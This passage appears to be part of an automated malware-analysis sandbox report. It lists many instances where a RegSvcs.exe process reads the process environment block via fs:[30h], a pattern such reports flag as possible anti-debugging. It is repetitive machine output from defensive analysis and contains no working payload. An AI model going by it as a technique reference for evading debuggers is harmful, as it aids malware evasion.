                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01732750 mov eax, dword ptr fs:[00000030h]8_2_01732750
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01732750 mov eax, dword ptr fs:[00000030h]8_2_01732750
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0177E75D mov eax, dword ptr fs:[00000030h]8_2_0177E75D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0172674D mov esi, dword ptr fs:[00000030h]8_2_0172674D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0172674D mov eax, dword ptr fs:[00000030h]8_2_0172674D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0172674D mov eax, dword ptr fs:[00000030h]8_2_0172674D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_016F0750 mov eax, dword ptr fs:[00000030h]8_2_016F0750
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0176C730 mov eax, dword ptr fs:[00000030h]8_2_0176C730
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0172273C mov eax, dword ptr fs:[00000030h]8_2_0172273C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0172273C mov ecx, dword ptr fs:[00000030h]8_2_0172273C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0172273C mov eax, dword ptr fs:[00000030h]8_2_0172273C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0172C720 mov eax, dword ptr fs:[00000030h]8_2_0172C720
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0172C720 mov eax, dword ptr fs:[00000030h]8_2_0172C720
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01720710 mov eax, dword ptr fs:[00000030h]8_2_01720710
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0172C700 mov eax, dword ptr fs:[00000030h]8_2_0172C700
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_016F0710 mov eax, dword ptr fs:[00000030h]8_2_016F0710
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_016F47FB mov eax, dword ptr fs:[00000030h]8_2_016F47FB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_016F47FB mov eax, dword ptr fs:[00000030h]8_2_016F47FB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0177E7E1 mov eax, dword ptr fs:[00000030h]8_2_0177E7E1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_017127ED mov eax, dword ptr fs:[00000030h]8_2_017127ED
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_017127ED mov eax, dword ptr fs:[00000030h]8_2_017127ED
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_017127ED mov eax, dword ptr fs:[00000030h]8_2_017127ED
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_016FC7C0 mov eax, dword ptr fs:[00000030h]8_2_016FC7C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_017707C3 mov eax, dword ptr fs:[00000030h]8_2_017707C3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_016F07AF mov eax, dword ptr fs:[00000030h]8_2_016F07AF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_017A47A0 mov eax, dword ptr fs:[00000030h]8_2_017A47A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0179678E mov eax, dword ptr fs:[00000030h]8_2_0179678E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01722674 mov eax, dword ptr fs:[00000030h]8_2_01722674
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0172A660 mov eax, dword ptr fs:[00000030h]8_2_0172A660
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0172A660 mov eax, dword ptr fs:[00000030h]8_2_0172A660
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_017B866E mov eax, dword ptr fs:[00000030h]8_2_017B866E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_017B866E mov eax, dword ptr fs:[00000030h]8_2_017B866E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0170C640 mov eax, dword ptr fs:[00000030h]8_2_0170C640
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_016F262C mov eax, dword ptr fs:[00000030h]8_2_016F262C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01726620 mov eax, dword ptr fs:[00000030h]8_2_01726620
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01728620 mov eax, dword ptr fs:[00000030h]8_2_01728620
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0170E627 mov eax, dword ptr fs:[00000030h]8_2_0170E627
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01732619 mov eax, dword ptr fs:[00000030h]8_2_01732619
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0170260B mov eax, dword ptr fs:[00000030h]8_2_0170260B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0170260B mov eax, dword ptr fs:[00000030h]8_2_0170260B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0170260B mov eax, dword ptr fs:[00000030h]8_2_0170260B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0170260B mov eax, dword ptr fs:[00000030h]8_2_0170260B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0170260B mov eax, dword ptr fs:[00000030h]8_2_0170260B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0170260B mov eax, dword ptr fs:[00000030h]8_2_0170260B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0170260B mov eax, dword ptr fs:[00000030h]8_2_0170260B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0176E609 mov eax, dword ptr fs:[00000030h]8_2_0176E609
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0176E6F2 mov eax, dword ptr fs:[00000030h]8_2_0176E6F2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0176E6F2 mov eax, dword ptr fs:[00000030h]8_2_0176E6F2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0176E6F2 mov eax, dword ptr fs:[00000030h]8_2_0176E6F2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0176E6F2 mov eax, dword ptr fs:[00000030h]8_2_0176E6F2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_017706F1 mov eax, dword ptr fs:[00000030h]8_2_017706F1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_017706F1 mov eax, dword ptr fs:[00000030h]8_2_017706F1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0172A6C7 mov ebx, dword ptr fs:[00000030h]8_2_0172A6C7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0172A6C7 mov eax, dword ptr fs:[00000030h]8_2_0172A6C7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_017266B0 mov eax, dword ptr fs:[00000030h]8_2_017266B0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0172C6A6 mov eax, dword ptr fs:[00000030h]8_2_0172C6A6
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_016F4690 mov eax, dword ptr fs:[00000030h]8_2_016F4690
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_016F4690 mov eax, dword ptr fs:[00000030h]8_2_016F4690
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01794978 mov eax, dword ptr fs:[00000030h]8_2_01794978
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01794978 mov eax, dword ptr fs:[00000030h]8_2_01794978
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0177C97C mov eax, dword ptr fs:[00000030h]8_2_0177C97C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01716962 mov eax, dword ptr fs:[00000030h]8_2_01716962
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01716962 mov eax, dword ptr fs:[00000030h]8_2_01716962
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01716962 mov eax, dword ptr fs:[00000030h]8_2_01716962
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0173096E mov eax, dword ptr fs:[00000030h]8_2_0173096E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0173096E mov edx, dword ptr fs:[00000030h]8_2_0173096E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0173096E mov eax, dword ptr fs:[00000030h]8_2_0173096E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01770946 mov eax, dword ptr fs:[00000030h]8_2_01770946
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0178892B mov eax, dword ptr fs:[00000030h]8_2_0178892B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0177892A mov eax, dword ptr fs:[00000030h]8_2_0177892A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0177C912 mov eax, dword ptr fs:[00000030h]8_2_0177C912
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_016E8918 mov eax, dword ptr fs:[00000030h]8_2_016E8918
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_016E8918 mov eax, dword ptr fs:[00000030h]8_2_016E8918
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0176E908 mov eax, dword ptr fs:[00000030h]8_2_0176E908
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0176E908 mov eax, dword ptr fs:[00000030h]8_2_0176E908
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_017229F9 mov eax, dword ptr fs:[00000030h]8_2_017229F9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_017229F9 mov eax, dword ptr fs:[00000030h]8_2_017229F9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0177E9E0 mov eax, dword ptr fs:[00000030h]8_2_0177E9E0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_017249D0 mov eax, dword ptr fs:[00000030h]8_2_017249D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_017BA9D3 mov eax, dword ptr fs:[00000030h]8_2_017BA9D3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_017869C0 mov eax, dword ptr fs:[00000030h]8_2_017869C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_016FA9D0 mov eax, dword ptr fs:[00000030h]8_2_016FA9D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_016FA9D0 mov eax, dword ptr fs:[00000030h]8_2_016FA9D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_016FA9D0 mov eax, dword ptr fs:[00000030h]8_2_016FA9D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_016FA9D0 mov eax, dword ptr fs:[00000030h]8_2_016FA9D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_016FA9D0 mov eax, dword ptr fs:[00000030h]8_2_016FA9D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_016FA9D0 mov eax, dword ptr fs:[00000030h]8_2_016FA9D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_016F09AD mov eax, dword ptr fs:[00000030h]8_2_016F09AD
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_016F09AD mov eax, dword ptr fs:[00000030h]8_2_016F09AD
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_017789B3 mov esi, dword ptr fs:[00000030h]8_2_017789B3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_017789B3 mov eax, dword ptr fs:[00000030h]8_2_017789B3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_017789B3 mov eax, dword ptr fs:[00000030h]8_2_017789B3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_017029A0 mov eax, dword ptr fs:[00000030h]8_2_017029A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_017029A0 mov eax, dword ptr fs:[00000030h]8_2_017029A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_017029A0 mov eax, dword ptr fs:[00000030h]8_2_017029A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_017029A0 mov eax, dword ptr fs:[00000030h]8_2_017029A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_017029A0 mov eax, dword ptr fs:[00000030h]8_2_017029A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_017029A0 mov eax, dword ptr fs:[00000030h]8_2_017029A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_017029A0 mov eax, dword ptr fs:[00000030h]8_2_017029A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_017029A0 mov eax, dword ptr fs:[00000030h]8_2_017029A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_017029A0 mov eax, dword ptr fs:[00000030h]8_2_017029A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_017029A0 mov eax, dword ptr fs:[00000030h]8_2_017029A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_017029A0 mov eax, dword ptr fs:[00000030h]8_2_017029A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_017029A0 mov eax, dword ptr fs:[00000030h]8_2_017029A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_017029A0 mov eax, dword ptr fs:[00000030h]8_2_017029A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0177E872 mov eax, dword ptr fs:[00000030h]8_2_0177E872
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0177E872 mov eax, dword ptr fs:[00000030h]8_2_0177E872
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01786870 mov eax, dword ptr fs:[00000030h]8_2_01786870
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01786870 mov eax, dword ptr fs:[00000030h]8_2_01786870
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01720854 mov eax, dword ptr fs:[00000030h]8_2_01720854
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01702840 mov ecx, dword ptr fs:[00000030h]8_2_01702840
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_016F4859 mov eax, dword ptr fs:[00000030h]8_2_016F4859
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_016F4859 mov eax, dword ptr fs:[00000030h]8_2_016F4859
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0172A830 mov eax, dword ptr fs:[00000030h]8_2_0172A830
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0179483A mov eax, dword ptr fs:[00000030h]8_2_0179483A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0179483A mov eax, dword ptr fs:[00000030h]8_2_0179483A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01712835 mov eax, dword ptr fs:[00000030h]8_2_01712835
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01712835 mov eax, dword ptr fs:[00000030h]8_2_01712835
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01712835 mov eax, dword ptr fs:[00000030h]8_2_01712835
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01712835 mov ecx, dword ptr fs:[00000030h]8_2_01712835
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01712835 mov eax, dword ptr fs:[00000030h]8_2_01712835
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01712835 mov eax, dword ptr fs:[00000030h]8_2_01712835
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0177C810 mov eax, dword ptr fs:[00000030h]8_2_0177C810
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0172C8F9 mov eax, dword ptr fs:[00000030h]8_2_0172C8F9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0172C8F9 mov eax, dword ptr fs:[00000030h]8_2_0172C8F9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_017BA8E4 mov eax, dword ptr fs:[00000030h]8_2_017BA8E4
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0171E8C0 mov eax, dword ptr fs:[00000030h]8_2_0171E8C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_016F0887 mov eax, dword ptr fs:[00000030h]8_2_016F0887
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0177C89D mov eax, dword ptr fs:[00000030h]8_2_0177C89D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_016ECB7E mov eax, dword ptr fs:[00000030h]8_2_016ECB7E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0179EB50 mov eax, dword ptr fs:[00000030h]8_2_0179EB50
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_017A4B4B mov eax, dword ptr fs:[00000030h]8_2_017A4B4B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_017A4B4B mov eax, dword ptr fs:[00000030h]8_2_017A4B4B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01786B40 mov eax, dword ptr fs:[00000030h]8_2_01786B40
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01786B40 mov eax, dword ptr fs:[00000030h]8_2_01786B40
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_017BAB40 mov eax, dword ptr fs:[00000030h]8_2_017BAB40
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01798B42 mov eax, dword ptr fs:[00000030h]8_2_01798B42
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0171EB20 mov eax, dword ptr fs:[00000030h]8_2_0171EB20
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0171EB20 mov eax, dword ptr fs:[00000030h]8_2_0171EB20
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_017B8B28 mov eax, dword ptr fs:[00000030h]8_2_017B8B28
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_017B8B28 mov eax, dword ptr fs:[00000030h]8_2_017B8B28
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0176EB1D mov eax, dword ptr fs:[00000030h]8_2_0176EB1D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0176EB1D mov eax, dword ptr fs:[00000030h]8_2_0176EB1D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0176EB1D mov eax, dword ptr fs:[00000030h]8_2_0176EB1D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0176EB1D mov eax, dword ptr fs:[00000030h]8_2_0176EB1D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0176EB1D mov eax, dword ptr fs:[00000030h]8_2_0176EB1D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0176EB1D mov eax, dword ptr fs:[00000030h]8_2_0176EB1D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0176EB1D mov eax, dword ptr fs:[00000030h]8_2_0176EB1D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0176EB1D mov eax, dword ptr fs:[00000030h]8_2_0176EB1D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0176EB1D mov eax, dword ptr fs:[00000030h]8_2_0176EB1D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0177CBF0 mov eax, dword ptr fs:[00000030h]8_2_0177CBF0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0171EBFC mov eax, dword ptr fs:[00000030h]8_2_0171EBFC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_016F8BF0 mov eax, dword ptr fs:[00000030h]8_2_016F8BF0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_016F8BF0 mov eax, dword ptr fs:[00000030h]8_2_016F8BF0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_016F8BF0 mov eax, dword ptr fs:[00000030h]8_2_016F8BF0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_016F0BCD mov eax, dword ptr fs:[00000030h]8_2_016F0BCD
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_016F0BCD mov eax, dword ptr fs:[00000030h]8_2_016F0BCD
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_016F0BCD mov eax, dword ptr fs:[00000030h]8_2_016F0BCD
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0179EBD0 mov eax, dword ptr fs:[00000030h]8_2_0179EBD0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01710BCB mov eax, dword ptr fs:[00000030h]8_2_01710BCB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01710BCB mov eax, dword ptr fs:[00000030h]8_2_01710BCB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01710BCB mov eax, dword ptr fs:[00000030h]8_2_01710BCB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_017A4BB0 mov eax, dword ptr fs:[00000030h]8_2_017A4BB0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_017A4BB0 mov eax, dword ptr fs:[00000030h]8_2_017A4BB0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01700BBE mov eax, dword ptr fs:[00000030h]8_2_01700BBE
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01700BBE mov eax, dword ptr fs:[00000030h]8_2_01700BBE
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0176CA72 mov eax, dword ptr fs:[00000030h]8_2_0176CA72
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0176CA72 mov eax, dword ptr fs:[00000030h]8_2_0176CA72
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0179EA60 mov eax, dword ptr fs:[00000030h]8_2_0179EA60
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0172CA6F mov eax, dword ptr fs:[00000030h]8_2_0172CA6F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0172CA6F mov eax, dword ptr fs:[00000030h]8_2_0172CA6F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0172CA6F mov eax, dword ptr fs:[00000030h]8_2_0172CA6F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01700A5B mov eax, dword ptr fs:[00000030h]8_2_01700A5B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01700A5B mov eax, dword ptr fs:[00000030h]8_2_01700A5B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_016F6A50 mov eax, dword ptr fs:[00000030h]8_2_016F6A50
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_016F6A50 mov eax, dword ptr fs:[00000030h]8_2_016F6A50
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_016F6A50 mov eax, dword ptr fs:[00000030h]8_2_016F6A50
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_016F6A50 mov eax, dword ptr fs:[00000030h]8_2_016F6A50
